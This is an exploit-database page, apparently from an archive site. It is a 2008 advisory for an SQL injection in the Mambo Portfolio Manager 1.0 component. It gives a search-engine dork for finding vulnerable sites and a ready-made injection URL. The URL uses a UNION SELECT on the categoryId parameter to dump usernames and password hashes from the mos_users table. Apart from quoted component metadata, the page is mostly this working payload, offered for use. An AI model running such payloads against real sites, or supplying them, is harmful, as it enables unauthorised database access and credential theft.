Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability
# Published : 2008-02-18
# Author : it's my
# Previous Title : Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability
# Next Title : LightBlog 9.6 (username) Local File Inclusion Vulnerability

#########################################################
##
##  Mambo component Portfolio Manager 1.0 (com_portfolio)
##
##
##  Author: it's my
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_portfolio"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

#########################################################
## it's my sick world =/   ####    www.antichat.ru
#########################################################



    <name>portfolio</name>
    <creationDate>2005.09.15</creationDate>
    <author>Garry Malhi</author>
    <copyright>This component  is released under the GNU/GPL License</copyright>
    <authorEmail></authorEmail>
    <authorUrl></authorUrl>

    <version>1.0</version>
    <description>Portfolio Manager Component</description>

# www.Syue.com [2008-02-18]